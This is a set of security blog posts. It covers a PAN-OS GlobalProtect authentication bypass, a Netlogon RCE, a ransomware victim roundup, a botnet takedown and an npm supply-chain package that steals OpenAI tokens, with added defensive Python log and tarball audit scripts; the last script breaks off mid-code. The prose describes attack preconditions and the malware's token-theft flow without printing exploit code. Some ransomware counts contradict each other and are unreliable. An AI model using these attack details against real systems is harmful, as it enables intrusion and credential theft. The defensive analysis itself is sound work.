Further details on this issue are in our prior analysis of CVE-2026-0257. The rapid pace of exploit development, sometimes accelerated by advanced tooling, means the window between vulnerability disclosure and active exploitation shrinks. Our research on AI's role in accelerating exploit development discusses this trend. Which products are affected by CVE-2026-0257? The CVE-2026-0257 vulnerability affects specific products and configurations within the Palo Alto Networks ecosystem. Organizations relying on these products for VPN access control should review their deployments carefully. Affected products include: Palo Alto Networks PAN-OS: Specifically, firewalls running PAN-OS with a GlobalProtect portal or gateway configured are vulnerable. Enabled authentication override cookies and a specific certificate configuration are critical factors in the vulnerability's exploitability. Palo Alto Networks Prisma Access: This cloud-delivered security platform is also impacted by the same authentication bypass flaw when its GlobalProtect functionalities are configured under the specific conditions mentioned. The research indicates the vulnerability appears when a GlobalProtect portal or gateway is configured, authentication override cookies are enabled, and a specific certificate configuration exists. Since the research does not specify exact version numbers for affected PAN-OS or Prisma Access, all versions configured under these conditions should be considered potentially vulnerable until specific guidance from Palo Alto Networks states otherwise. Organizations must consult official Palo Alto Networks advisories for the precise scope of affected versions and any applicable patch information. What are the detection measures for CVE-2026-0257? Effective detection of CVE-2026-0257 exploitation depends on monitoring network and system logs for anomalous activity, particularly related to VPN connections and authentication processes. 
The research does not detail specific Indicators of Compromise (IOCs) like precise log signatures or EDR queries, but a proactive monitoring strategy can identify suspicious behavior that may signal compromise. Organizations should implement the following detection measures: Monitor VPN Connection Logs: Look for unexpected or unauthorized VPN connections to GlobalProtect portals or gateways. This includes connections originating from unusual geographical locations, IP addresses not associated with legitimate users, or at abnormal times. Track the number of failed authentication attempts followed by successful connections without a clear, legitimate reason. Focus on GlobalProtect session logs for any entries indicating successful connections where the expected authentication flow appears abnormal or incomplete. Review Authentication Logs: Scrutinize authentication logs for the GlobalProtect portal and gateway for any bypass events or successful authentications that do not correspond to known user activity. Monitor for the creation of VPN sessions without corresponding pre-authentication entries in logs. Certificate Configuration Monitoring: Regularly audit the certificate configurations on GlobalProtect interfaces. Any unauthorized changes or unusual activity related to certificate issuance, revocation, or usage should be investigated. Network Flow Analysis: Analyze network flow data (NetFlow, IPFIX, sFlow) for unusual traffic patterns originating from newly established VPN tunnels. This could include sudden spikes in data transfer, connections to internal assets not typically accessed by VPN users, or communication with known malicious external IP addresses. Security Information and Event Management (SIEM) Alerts: Configure SIEM systems to alert on the aforementioned anomalies. Establish baselines for normal VPN usage and flag deviations, especially those related to authentication events and source IP reputation. 
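The three log checks listed above (logins from unexpected geographies, failure bursts followed by a success, and sessions established from a cookie with no interactive authentication behind them) can be expressed as a small baseline script. The block below is an added example, not code from the page or from Palo Alto Networks: the records are constructed and use a simplified six-field layout rather than the real PAN-OS GlobalProtect log schema, and the allowed-country set, cookie lifetime and failure thresholds are assumptions to tune per environment.

```python
"""Baseline checks over GlobalProtect-style VPN logs for the anomalies listed above.

Added example, not the page's or Palo Alto Networks' code. The records are
constructed and use a simplified layout (timestamp, event, user, source IP,
source country, auth method); the real PAN-OS GlobalProtect log schema differs.
The allowed-country set, cookie lifetime and failure thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample. "portal-auth" is an interactive portal authentication,
# "gateway-login" a tunnel being established; method "cookie" means the
# authentication override cookie was presented instead of credentials.
SAMPLE_LOG = [
    ("2026-06-01T10:00:00", "portal-auth",      "dave",  "203.0.113.8",   "US", "saml"),
    ("2026-06-02T08:01:10", "portal-auth",      "alice", "203.0.113.5",   "US", "saml"),
    ("2026-06-02T08:01:15", "gateway-login",    "alice", "203.0.113.5",   "US", "saml"),
    ("2026-06-02T08:20:00", "gateway-login",    "bob",   "198.51.100.77", "RU", "cookie"),
    ("2026-06-02T09:00:01", "portal-auth-fail", "carol", "192.0.2.9",     "US", "ldap"),
    ("2026-06-02T09:00:05", "portal-auth-fail", "carol", "192.0.2.9",     "US", "ldap"),
    ("2026-06-02T09:00:09", "portal-auth-fail", "carol", "192.0.2.9",     "US", "ldap"),
    ("2026-06-02T09:00:12", "portal-auth-fail", "carol", "192.0.2.9",     "US", "ldap"),
    ("2026-06-02T09:00:14", "portal-auth-fail", "carol", "192.0.2.9",     "US", "ldap"),
    ("2026-06-02T09:00:20", "gateway-login",    "carol", "192.0.2.9",     "US", "cookie"),
    ("2026-06-02T22:30:00", "gateway-login",    "dave",  "203.0.113.8",   "US", "cookie"),
]

ALLOWED_COUNTRIES = {"US", "CA"}          # assumption: where the workforce normally connects from
COOKIE_LIFETIME = timedelta(hours=24)     # assumption: configured authentication override cookie lifetime
FAILURE_THRESHOLD = 4                     # failures inside FAILURE_WINDOW that make a following success suspicious
FAILURE_WINDOW = timedelta(minutes=5)


def detect_anomalies(records, allowed_countries=ALLOWED_COUNTRIES,
                     cookie_lifetime=COOKIE_LIFETIME):
    """Return (user, src_ip, reason) findings for the three checks the text describes:
    logins from unexpected geographies, failure bursts followed by success, and
    cookie-based sessions with no interactive authentication inside the cookie lifetime."""
    findings = []
    last_auth = {}                         # user -> time of last successful interactive auth
    failures = defaultdict(list)           # user -> timestamps of recent failures
    for ts_s, event, user, ip, country, method in sorted(records):
        ts = datetime.fromisoformat(ts_s)
        if event == "portal-auth":
            last_auth[user] = ts
            failures[user].clear()
        elif event == "portal-auth-fail":
            failures[user].append(ts)
        elif event == "gateway-login":
            if country not in allowed_countries:
                findings.append((user, ip, f"login from unexpected country {country}"))
            recent = [t for t in failures[user] if ts - t <= FAILURE_WINDOW]
            if len(recent) >= FAILURE_THRESHOLD:
                findings.append((user, ip, f"{len(recent)} failures then success"))
            if method == "cookie":
                prior = last_auth.get(user)
                if prior is None or ts - prior > cookie_lifetime:
                    findings.append((user, ip, "cookie login without interactive auth inside cookie lifetime"))
    return findings


if __name__ == "__main__":
    for user, ip, reason in detect_anomalies(SAMPLE_LOG):
        print(f"{user:6} {ip:15} {reason}")
```

On the constructed sample, alice (interactive SAML auth then tunnel) produces nothing, while bob, carol and dave each trigger at least one finding; the cookie check is the one most directly tied to this CVE, since a tunnel built from a cookie that no interactive authentication could have issued is exactly the signature of the bypass. Replace `COOKIE_LIFETIME` with the lifetime actually configured on the portal or gateway, otherwise legitimate cookie reuse will be flagged.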
Continuous and vigilant monitoring is essential to detect and respond to potential compromises swiftly. What is the remediation guidance for CVE-2026-0257? Remediation for CVE-2026-0257 is crucial due to its active exploitation. The primary focus involves patching the vulnerability, or if a patch is not immediately available or deployable, implementing effective workarounds and mitigations. The following steps outline the remediation guidance: Apply Vendor Patches: Immediately consult official Palo Alto Networks security advisories and support channels for information regarding available patches for PAN-OS and Prisma Access. Apply all recommended security updates to all affected devices as soon as they are released and thoroughly tested in a staging environment. Given the active exploitation, patching should be prioritized over routine maintenance schedules. Implement Workarounds and Mitigations: Disable Authentication Override Cookies: If feasible and not critical for operational continuity, disable authentication override cookies on GlobalProtect portal and gateway configurations. This removes one of the key preconditions for CVE-2026-0257 exploitation. Review and Restrict Certificate Configurations: Carefully review the certificate configurations on GlobalProtect interfaces. Ensure that only necessary and properly configured certificates are in use and that they adhere to strong security practices. Remove any certificates that are not explicitly required. Enforce Strong Multi-Factor Authentication (MFA): While CVE-2026-0257 is an authentication bypass, strong MFA implementations can provide an additional layer of defense against follow-on attacks, even if the initial VPN connection is established. This ensures that even if an attacker gains unauthorized access, they still face hurdles in accessing internal resources that require MFA. 
Network Segmentation: Implement or strengthen network segmentation to limit the potential lateral movement of an attacker who manages to establish an unauthorized VPN connection. Isolate sensitive assets and restrict communication paths. Access Control Policies: Review and tighten access control policies for users connecting via GlobalProtect. Ensure that VPN users only have access to the resources absolutely necessary for their roles (least privilege principle). Enhance Monitoring: Continue to actively monitor VPN and authentication logs for any anomalous activity, as detailed in the detection section. Immediate alerting for suspicious connections can help in rapid incident response. Conduct regular security audits of GlobalProtect configurations to ensure compliance with best practices and the vendor's latest recommendations. Technical Takeaways CVE-2026-0257 is an actively exploited authentication bypass vulnerability affecting Palo Alto Networks PAN-OS and Prisma Access, specifically their GlobalProtect portal and gateway components. The vulnerability carries a CVSS score of 7.8, indicating a high potential impact despite being classified as medium-severity. Exploitation requires enabled authentication override cookies and a specific certificate configuration on the targeted firewalls. Successful exploitation grants unauthorized threat actors the ability to establish VPN connections, providing initial network access. Organizations must immediately apply available patches and implement mitigations like disabling authentication override cookies and reviewing certificate configurations if patching is not feasible. Continuous monitoring of VPN and authentication logs for anomalous connections is critical for early detection of exploitation attempts or successful breaches. 
---

## Gentelman Ransomware Hits 14 Healthcare, Retail Victims

- URL: https://purple-ops.io/blog/gentelman-ransomware-healthcare-retail
- Date: 2026-06-01
- Category: Ransomware Report
- Tags: none
- Reading time: 5 min

**Summary:** The Gentelman ransomware group claimed 14 new victims, predominantly impacting healthcare and retail sectors with active operations.

The Gentelman Ransomware Claims 14 Healthcare, Retail Victims

Statistical Overview

Victim Totals
- This month: 27
- This quarter: 1573
- Year to date: 4198
- Last 24h: 29

Quarterly Breakdown: Q1: 2631 | Q2: 1573 | Q3: 0 | Q4: 0

Ransomware activity maintains a consistent volume, with 29 new victims reported in the last 24 hours. Quarterly data indicates substantial impact across global organizations, accumulating 1573 victims in Q2.

Introduction

In the last 24 hours, ransomware operators claimed 29 new victims across various sectors and geographies. The Gentelman group was active, accounting for 14 of these new compromises. Other groups included DragonForce, Abyss, INC Ransom, and Lapsus. Primary affected sectors observed include Healthcare, Retail & Ecommerce, Professional Services, and Government / Public Sector, with attacks concentrated in North America, including the United States and Canada.
Ransomware Summary Table

| # | Group | Victims (24h) | Sample Victims | Geos | Sectors |
|---|---|---|---|---|---|
| 1 | The Gentelman | 14 | Anandji haridas, Arabian procession holding, Bouri group (+11) | Hong Kong, Canada | Healthcare, Retail & Ecommerce |
| 2 | DragonForce | 3 | Panorama bpo, Synex international pvt ltd, Taos mountain casino | United States, Peru | Construction & Engineering, Professional Services |
| 3 | Abyss | 2 | Landkreis-limburg-weilburg.de, School facility consultants | Germany, United States | Professional Services, Government / Public Sector |
| 4 | INC Ransom | 2 | Bradley law firm, Champaign-Urbana Public Health District | United States | Healthcare, Legal |
| 5 | Lapsus | 2 | Mapfre assurance, Mercor | United States, Spain | Insurance, Technology / Software |
| 6 | Play News | 2 | Digitall graphics, Hightower communications | United States, Canada | Professional Services, Telecommunications |
| 7 | AiLock | 1 | Schneebeli | Switzerland | Manufacturing |
| 8 | Brain Cipher | 1 | Squamish.net | Canada | Government / Public Sector |
| 9 | Bravox | 1 | Grupo mauá | Brazil | Professional Services |
| 10 | Kairos | 1 | Mortensenlawoffices | United States | Legal |

Ransomware activity remains elevated, largely driven by The Gentelman, which claimed 14 victims, predominantly in Healthcare and Retail & Ecommerce across Hong Kong and Canada. Other groups such as DragonForce and Abyss also contributed to the victim count, targeting sectors like Professional Services and Government / Public Sector. INC Ransom impacted the Champaign-Urbana Public Health District in the United States, showing the ongoing threat to critical public services. The geographic distribution shows a continued focus on North America, alongside incidents in Europe, South America, and Asia. Further insights into the activity of The Gentelman ransomware group are available in our dedicated analysis.
Victim Distribution

By Country
- United States: 11
- Canada: 4
- India: 2
- Brazil: 2
- Spain: 1
- Thailand: 1
- Switzerland: 1
- Sri Lanka: 1
- Saudi Arabia: 1
- Portugal: 1

By Industry
- Legal Services: 2
- Automotive Manufacturing: 2
- Telecommunications: 2
- Insurance: 1
- Water Utility: 1
- School Facility Planning and Consulting: 1
- Public Health: 1
- Law Practice: 1
- Industrial Textile Manufacturing: 1
- Healthcare: 1

The United States continues to be the primary target region, accounting for 11 out of 29 new victims, followed by Canada. Industry targeting is diverse. Legal Services and Automotive Manufacturing each saw multiple incidents, with Telecommunications also experiencing two, reflecting a broad opportunistic approach by ransomware groups.

Ransomware News

Topline

VSP Solutions, an Australian video security distributor, is responding to a cyber security incident claimed by the Stormous ransomware-as-a-service group.

Campaigns & Operations

Stormous has reportedly exfiltrated and published over 40 GB of data from VSP Solutions, encompassing financial backups (QuickBooks & Reckon), email archives, staff personal folders, and customer databases. The company has engaged forensic experts, notified law enforcement and Australian government agencies, and is investigating the incident's scope. Stormous, known for its double-extortion tactics and data publication, continues to use compromised access against technology and business services globally.

Vulnerabilities & TTPs

The specific initial access vector for the VSP Solutions breach was not detailed. However, Stormous's operational methods consistently involve data exfiltration followed by publication if demands are unmet, employing double-extortion as a core tactic.

Analyst Note

This incident shows the persistent threat posed by established ransomware-as-a-service groups like Stormous, which continue to successfully compromise and extort organizations through data theft and publication.
Technical Takeaways
- The Gentelman emerged as the most active ransomware group, responsible for nearly half of the new victims observed.
- Targeting remains globally diverse but shows a concentration in North America, with the United States and Canada experiencing a large volume of attacks.
- Healthcare, Retail & Ecommerce, Professional Services, and Government / Public Sector are among the top-affected sectors, indicating continued opportunistic targeting across various industries.
- Ransomware-as-a-service (RaaS) groups, exemplified by Stormous, continue to use double-extortion tactics involving data theft and publication to pressure victims.
- Critical infrastructure entities, such as public health districts, remain vulnerable to compromise by groups like INC Ransom.

---

## Netlogon RCE CVE-2026-41089 (CVSS 9.8) Actively Exploited

- URL: https://purple-ops.io/blog/netlogon-rce-cve-2026-41089
- Date: 2026-06-01
- Category: CVE Analysis
- Tags: netlogon, cve-2026-41089, rce, windows-server, actively-exploited
- Reading time: 5 min | CVSS: 9.8

**Summary:** CVE-2026-41089, a critical Netlogon RCE with a CVSS 9.8, is actively exploited, allowing unauthenticated attackers SYSTEM privileges on Windows Server.

Netlogon RCE CVE-2026-41089 (CVSS 9.8) Actively Exploited

Microsoft's Netlogon service in Windows Server is affected by a critical Remote Code Execution (RCE) vulnerability, tracked as CVE-2026-41089. This flaw, with a CVSS score of 9.8, allows attackers to execute arbitrary malicious code with SYSTEM privileges on vulnerable domain controllers. Threat actors are actively exploiting CVE-2026-41089 in the wild, posing an immediate risk to corporate network infrastructure. The vulnerability enables an unauthenticated attacker to compromise domain controllers remotely without requiring user interaction. Successful exploitation grants complete control over affected enterprise identities and core authentication systems.
Organizations must act immediately to mitigate the risk and prevent further compromise. Microsoft addressed CVE-2026-41089 as part of its May 2026 Patch Tuesday release, which included fixes for 118 vulnerabilities. This particular flaw is considered a significant threat to corporate networks among the patched vulnerabilities. Organizations must prioritize deploying these security updates to protect their environments. What is CVE-2026-41089 and why is it critical? CVE-2026-41089 is a critical Remote Code Execution (RCE) vulnerability in the Netlogon service of Microsoft Windows Server. This flaw is critical because of its CVSS score of 9.8 and its ability to enable unauthenticated attackers to achieve SYSTEM-level privileges on vulnerable domain controllers remotely. The vulnerability stems from improper handling of specially crafted network data packets by the Netlogon service. The criticality of CVE-2026-41089 is significant because it can fully compromise an organization's authentication infrastructure. An attacker who successfully exploits this vulnerability can gain complete administrative control over the domain controller, subsequently allowing control over all connected systems and user accounts within the domain. This level of access bypasses all typical security boundaries, giving adversaries an unfettered pathway to persistent network presence, data exfiltration, and widespread disruption. The absence of a requirement for user interaction or prior authorization also shows its severity, making it an attractive target for malicious campaigns. Impact An attacker exploiting CVE-2026-41089 can achieve Remote Code Execution (RCE) with SYSTEM privileges on the targeted Windows Server domain controller. This means they can execute any command or malicious payload on the compromised system as the highest-privileged user. The direct consequence is complete control over the domain controller itself. 
Organizations relying on Microsoft Windows Server for their authentication and directory services are at significant risk. Specifically, corporate networks with exposed domain controllers are vulnerable to this flaw. An attacker gaining SYSTEM privileges on a domain controller can effectively seize complete control of the entire corporate infrastructure. This includes managing user accounts, group policies, access to network resources, and potentially deploying ransomware or other destructive payloads across the entire domain. The real-world reach is widespread, affecting any enterprise environment operating unpatched Windows Server domain controllers. This malicious action requires zero user interaction and no prior authorization, allowing for complete system compromise, similar to the impact of some Windows kernel zero-day exploits. Exploitation Chain The exploitation of CVE-2026-41089 begins with an attacker sending a specially crafted network request to a vulnerable Windows Server domain controller. The vulnerability resides in the Netlogon service, which is responsible for user and machine authentication within a Windows domain. When the Netlogon service improperly handles this incoming data packet, it creates a condition that allows for Remote Code Execution. Preconditions for exploitation are minimal, primarily requiring network access to a susceptible Windows Server domain controller running the Netlogon service. Successful exploitation does not require any user interaction from the victim, nor does it necessitate prior authentication or authorization. This makes CVE-2026-41089 a zero-click, unauthenticated RCE vulnerability. The Centre for Cybersecurity Belgium (CCB) has confirmed that threat actors are actively executing this attack in the wild, indicating that public details and potentially Proof-of-Concept (PoC) exploits are available and used by malicious entities. 
The ability to gain SYSTEM privileges and control core authentication systems through a network service is a significant threat, similar to other critical operating system vulnerabilities, such as a Linux kernel local privilege escalation vulnerability. Affected Products and Versions The CVE-2026-41089 vulnerability affects specific versions of Microsoft Windows Server. All Windows Server versions from 2012 onwards that have not applied the May 2026 security updates are susceptible. The following Windows Server product lines and their respective versions are impacted: Microsoft Windows Server 2012 Microsoft Windows Server 2012 R2 Microsoft Windows Server 2016 Microsoft Windows Server 2019 Microsoft Windows Server 2022 Organizations operating any of these Windows Server versions as domain controllers are advised to assess their patch status immediately. The vulnerability is present in the Netlogon service component, which is fundamental to the operation of these domain controller roles. Detection Detecting exploitation attempts or successful compromise related to CVE-2026-41089 requires monitoring network traffic and system logs, particularly those related to the Netlogon service. Detection guidance includes: Network Indicators: Monitor network traffic for unusual authentication requests targeting domain controllers, especially those utilizing the Netlogon Remote Protocol (MS-NRPC). Unusual traffic, such as a sudden increase in Netlogon authentication requests from unexpected source IPs or with abnormal parameters, may indicate an exploitation attempt. Look for deviations from baseline Netlogon communication behaviors, including attempts to establish insecure or null sessions if not typically observed in the environment. Observe outbound network connections from domain controllers that are not part of normal operational behavior. These could signify successful RCE and subsequent command-and-control (C2) communication. 
Log Signatures: Review Netlogon event logs for anomalies. Investigate event IDs related to Netlogon service activity, authentication failures, and changes in Netlogon secure channel status. While specific event IDs directly indicating CVE-2026-41089 exploitation may not be documented, any unusual or failed Netlogon negotiation attempts require investigation. Examine Windows Security Event Logs on domain controllers for suspicious activity following any observed unusual Netlogon traffic. This includes: Event ID 4624 (An account was successfully logged on): Look for successful logons using system or machine accounts from unusual source workstations or IP addresses that correspond to the timing of suspected exploitation. Event ID 4672 (Special privileges assigned to new logon): This event indicates administrative privileges being assigned, which could happen post-exploitation. Event ID 4663 (An attempt was made to access an object): Monitor for access attempts to sensitive objects or files that differ from normal administrative activities. Analyze System Event Logs for any unexpected service crashes or restarts of the Netlogon service, which could occur during an exploitation attempt. Monitor for the creation of new user accounts, changes to existing highly privileged accounts, or unexpected scheduled tasks, which are common post-exploitation activities. Organizations should implement strong logging and security information and event management (SIEM) solutions to centralize and analyze these logs effectively. Baselines of normal Netlogon activity and domain controller behavior are essential to identify anomalies. Remediation Immediate action is required to address CVE-2026-41089 because it is critical and actively exploited. Remediation steps include: Patch Deployment: Deploy the security updates released by Microsoft as part of the May 2026 Patch Tuesday. These fixes address the vulnerability in the Netlogon service. 
System administrators should apply these patches immediately to all affected Windows Server versions (2012, 2012 R2, 2016, 2019, and 2022) that function as domain controllers. Prioritize domain controllers and other critical servers in the patching schedule. Verify the patch installation to confirm the update was successfully applied. Network Isolation and Segmentation: Immediately isolate exposed domain controllers from untrusted networks. This restricts direct access to the Netlogon service from external or less secure network segments, limiting the attack surface. Implement strict network segmentation so only authorized systems and personnel can communicate with domain controllers over the necessary ports and protocols. Review firewall rules and access control lists (ACLs) to enforce this. Continuous Monitoring: After patching and isolation, maintain continuous monitoring of network traffic for unusual authentication requests and thoroughly review Netlogon logs for anomalies. This ongoing vigilance confirms the effectiveness of remediation and detects any lingering compromise or new exploitation attempts. Implement auditing for changes to privileged user accounts and groups, as well as modifications to domain policies, to identify any unauthorized post-exploitation activity. Fast remediation prevents malicious actors from executing code and gaining total control over enterprise identities, reducing the risk of a widespread compromise. Technical Takeaways CVE-2026-41089 is a critical Remote Code Execution (RCE) vulnerability in the Netlogon service of Microsoft Windows Server. The vulnerability has a CVSS score of 9.8 (Critical), reflecting exploitability over the network without authentication or user interaction. Successful exploitation grants an attacker SYSTEM privileges on the targeted domain controller, which leads to full control over enterprise identities and infrastructure.
CVE-2026-41089 is confirmed to be under active exploitation in the wild by threat actors. Microsoft released patches for all affected Windows Server versions (2012, 2012 R2, 2016, 2019, 2022) as part of its May 2026 Patch Tuesday updates.

---

## CVE-2026-41089 Netlogon RCE Hits Domain Controllers

- URL: https://purple-ops.io/blog/cve-2026-41089-netlogon-rce
- Date: 2026-06-01
- Category: Threat Intelligence
- Tags: cve-2026-41089, netlogon-rce, windows-server, active-exploitation, domain-controller
- Reading time: 5 min

**Summary:** Microsoft's Netlogon RCE, CVE-2026-41089 with CVSS 9.8, is actively exploited to seize Windows domain controllers and gain SYSTEM privileges.

CVE-2026-41089 Netlogon RCE Hits Domain Controllers

Microsoft's Netlogon Remote Code Execution vulnerability (CVE-2026-41089, CVSS 9.8) is under active exploitation by threat actors targeting corporate networks worldwide. This critical flaw allows attackers to seize complete control of Windows domain controllers and gain SYSTEM privileges without prior authorization or user interaction. The Centre for Cybersecurity Belgium recently confirmed these in-the-wild attacks, which demonstrates an immediate and severe risk to enterprise infrastructure. The widespread use of Netlogon in enterprise environments makes this vulnerability dangerous. Successful exploitation grants adversaries an uncontested foothold, enabling broad reconnaissance, privilege escalation, lateral movement, and identity compromise across an organization's most sensitive systems. This could also disrupt critical business operations. Microsoft released patches for CVE-2026-41089 as part of its May 2026 Patch Tuesday. This update addressed 118 vulnerabilities, 16 rated as critical. The urgent deployment of these specific fixes is important for organizations to protect their core authentication systems from ongoing exploitation. How is the Netlogon RCE vulnerability being exploited in the wild?
Threat actors exploit CVE-2026-41089 by sending specially crafted network requests to unpatched Windows domain controllers. This causes the Netlogon service to improperly handle incoming data, which enables arbitrary code execution on the target system. Its CVSS score of 9.8 shows the vulnerability's critical impact. The exploit grants attackers full SYSTEM privileges on the affected domain controller, giving them complete administrative control over the compromised system. This malicious action requires zero user interaction and no prior authorization, allowing for silent and rapid compromise. The Centre for Cybersecurity Belgium issued an advisory confirming active exploitation, stressing that immediate defensive measures are needed to safeguard corporate infrastructure. Microsoft provided fixes for Windows Server versions from 2012 onwards in its May 2026 Patch Tuesday release. Organizations that have not yet applied these updates remain vulnerable to these active attacks. Prompt application of these security patches is the primary defense against this critical vulnerability. Remediation for CVE-2026-41089 System administrators must immediately deploy fixes for all affected Windows Server versions. This important step is the most effective way to prevent ongoing exploitation. Organizations should also consider isolating exposed domain controllers from untrusted networks to limit their attack surface while patches are applied. Further protective measures include continuous monitoring of network traffic for unusual authentication requests. Security operations centers should regularly review Netlogon logs for anomalies that could indicate attempted or successful exploitation. Maintaining strict patch hygiene and active monitoring remain fundamental defenses against advanced threat groups using vulnerabilities like CVE-2026-41089. 
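Both write-ups ask security operations teams to review domain-controller logs for anomalies, and the earlier CVE analysis names the Security-log events worth correlating: 4624 (logon), 4672 (special privileges assigned) and 4663 (object access). The block below is an added example, not Microsoft's or the page's tooling, that turns that guidance into a per-logon correlation: it flags machine-account network logons from addresses outside a known set and attaches the privilege assignments and object accesses that the same logon session produced shortly afterwards. The events are constructed records with a subset of the real event fields (the names TargetLogonId, SubjectLogonId, IpAddress, PrivilegeList and ObjectName follow the Windows event XML); the known-host set and the correlation window are assumptions.

```python
"""Correlate domain-controller Security-log events that the detection guidance above
singles out (4624, 4672, 4663) into per-logon chains.

Added example, not Microsoft's or the page's tooling. The events are constructed
records carrying a subset of the fields the real event XML has; the field names
(TargetLogonId, SubjectLogonId, IpAddress, PrivilegeList, ObjectName) follow the
Windows event schema. The known-host set and the correlation window are assumptions.
"""
from datetime import datetime, timedelta

# Constructed sample. 4624 reports TargetLogonId; later 4672/4663 events for the
# same session report that value as SubjectLogonId, which is what links them.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2026-06-01T03:10:05", "TargetUserName": "WS01$",
     "IpAddress": "10.0.5.21", "LogonType": 3, "TargetLogonId": "0x3e7a1"},
    {"EventID": 4624, "TimeCreated": "2026-06-01T03:12:40", "TargetUserName": "DC01$",
     "IpAddress": "203.0.113.44", "LogonType": 3, "TargetLogonId": "0x4f002"},
    {"EventID": 4672, "TimeCreated": "2026-06-01T03:12:41", "SubjectUserName": "DC01$",
     "SubjectLogonId": "0x4f002", "PrivilegeList": "SeDebugPrivilege"},
    {"EventID": 4663, "TimeCreated": "2026-06-01T03:13:02", "SubjectLogonId": "0x4f002",
     "ObjectName": "C:\\Windows\\NTDS\\ntds.dit", "AccessMask": "0x1"},
    {"EventID": 4624, "TimeCreated": "2026-06-01T08:00:00", "TargetUserName": "jsmith",
     "IpAddress": "10.0.5.30", "LogonType": 3, "TargetLogonId": "0x51111"},
    {"EventID": 4672, "TimeCreated": "2026-06-01T08:00:01", "SubjectUserName": "jsmith",
     "SubjectLogonId": "0x51111", "PrivilegeList": "SeBackupPrivilege"},
]

KNOWN_HOSTS = {"10.0.5.21", "10.0.5.30"}   # assumption: addresses that normally authenticate to this DC
WINDOW = timedelta(minutes=10)             # assumption: how long after the logon to look for follow-on events


def correlate(events, known_hosts=KNOWN_HOSTS, window=WINDOW):
    """Flag machine-account (name ends in '$') network logons from addresses outside
    known_hosts and attach the privilege assignments and object accesses that the
    same logon ID produced inside the window."""
    by_time = sorted(events, key=lambda e: e["TimeCreated"])
    chains = []
    for ev in by_time:
        if ev["EventID"] != 4624 or not ev["TargetUserName"].endswith("$"):
            continue
        if ev["IpAddress"] in known_hosts:
            continue
        start = datetime.fromisoformat(ev["TimeCreated"])
        logon_id = ev["TargetLogonId"]
        followups = []
        for f in by_time:
            if f["EventID"] not in (4672, 4663) or f.get("SubjectLogonId") != logon_id:
                continue
            delta = datetime.fromisoformat(f["TimeCreated"]) - start
            if timedelta(0) <= delta <= window:
                followups.append(f)
        chains.append({
            "account": ev["TargetUserName"],
            "src": ev["IpAddress"],
            "logon_id": logon_id,
            "privileges": [f["PrivilegeList"] for f in followups if f["EventID"] == 4672],
            "objects": [f["ObjectName"] for f in followups if f["EventID"] == 4663],
        })
    return chains


if __name__ == "__main__":
    for chain in correlate(SAMPLE_EVENTS):
        print(chain)
```

On the constructed sample, only the DC01$ logon from 203.0.113.44 is reported, together with the SeDebugPrivilege assignment and the ntds.dit access that followed within the window; the WS01$ logon from a known address and the human user jsmith are left alone. In production, feed it exported Security-log records (for example, `Get-WinEvent` output converted to JSON) and populate `KNOWN_HOSTS` from the subnets that legitimately talk to the DC, since the value of the chain lies in the unfamiliar source address rather than in any one event.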
Past incidents involving actively exploited Microsoft Exchange zero-days demonstrate the persistent threat posed by critical vulnerabilities in core enterprise services. Dutch Authorities Dismantle Large-Scale Asocks Botnet Affecting 17 Million Devices Dutch authorities, in a joint operation involving the Politie and the National Cyber Security Center (NCSC), have successfully dismantled a massive botnet known as Asocks. This botnet enslaved at least 17 million infected devices globally, using them for various malicious activities. The operation involved seizing more than 200 servers located in the Netherlands that served as the botnet's backend infrastructure. The infected devices encompassed a broad spectrum, including computers, tablets, smartphones, and various IoT devices. The NCSC identified Asocks as a residential proxy service, which, while having legitimate uses, is frequently abused by threat actors. Reports from local news outlet NL Times corroborated the botnet's identity as Asocks. Previous intelligence reports, such as HUMAN's Satori Threat Intelligence team's findings in April 2024, linked Asocks to a campaign dubbed PROXYLIB. This campaign involved infecting Android devices with proxyware from both LumiApps and Asocks, showing a history of malicious activity associated with this service. The law enforcement action involved seizing a subset of these servers from a hosting provider, which took the botnet offline. Botnet Infection and Mitigation Devices typically become part of a botnet when threat actors gain unauthorized access and install malware for remote control. This integrates the compromised device into a network used for cybercriminal activities. The scale of the Asocks botnet shows the pervasive nature of such infections. To counter botnet malware, organizations and individuals should implement several security practices. These include keeping operating systems and software applications up-to-date with the latest security patches. 
Maintaining visibility of edge devices, such as routers, is also important for identifying and mitigating potential compromises. Additional recommendations include using strong, unique passwords for all accounts and enabling two-factor authentication (2FA) wherever possible. Installing applications only from trusted sources and changing default passwords on new devices, particularly IoT devices, are important steps. Securing Wi-Fi networks with strong encryption protocols like WPA2 or WPA3 can further prevent unauthorized access and potential botnet recruitment. Malicious Codex UI npm Package Steals OpenAI Refresh Tokens from 27,000 Developers A malicious npm package, codexui-android, a popular remote web user interface for OpenAI Codex, has been discovered exfiltrating OpenAI refresh tokens from users. With an estimated 27,000 weekly downloads, this supply chain attack exposed a significant number of developers to persistent account takeover risks. Aikido Security researcher Charlie Eriksen made the discovery on May 27, 2026. The attackers employed a deceptive strategy, developing a useful tool likely to establish a legitimate user base before initiating malicious activity. The important element of this attack is that the malicious code was not present in the public GitHub repository. Instead, it was found exclusively within the published npm package, allowing it to bypass standard source code audits. The attack initiates immediately upon module load, with the dist-cli/index.js file importing a hidden script named chunk-PUR7OUAG.js. This script then checks for local credentials. If found, it launches a data exfiltration routine to steal access_token, id_token, account ID, and the important refresh_token from the auth.json file. The refresh token is dangerous as it typically does not expire, granting attackers indefinite access and impersonation capabilities. 
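The defining feature of this compromise is that the malicious code lived only in the published tarball, pulled in by a hidden chunk import that a review of the GitHub repository would never see. The block below is an added example, not Aikido Security's tooling and not code from the package: it builds a small npm-style tarball in memory from constructed contents (the file names follow the write-up above; the JavaScript inside is invented, and the credential path and the endpoint hostname are placeholders), then reports files that a build of the public repository does not contain, relative imports that resolve to such files, and strings that suggest credential reads or outbound posts. In practice, the repository side comes from building the tagged commit yourself and listing its output.

```python
"""Audit a published npm tarball against the source tree it claims to be built from.

Added example; not Aikido Security's tooling and not code from the package. It
builds a small tarball in memory from constructed contents (file names follow the
write-up above; the JavaScript inside is invented, and the credential path and
endpoint are placeholders), then reports files absent from the repository build,
relative imports that resolve to such files, and strings suggesting credential
reads or outbound posts.
"""
import io
import posixpath
import re
import tarfile

# Constructed package contents. npm tarballs prefix every path with 'package/'.
PACKAGE_FILES = {
    "package/package.json":
        b'{"name":"codexui-android","version":"1.0.0","bin":{"codexui":"dist-cli/index.js"}}',
    "package/dist-cli/index.js":
        b'import "./chunk-PUR7OUAG.js";\nimport { serve } from "./server.js";\nserve();\n',
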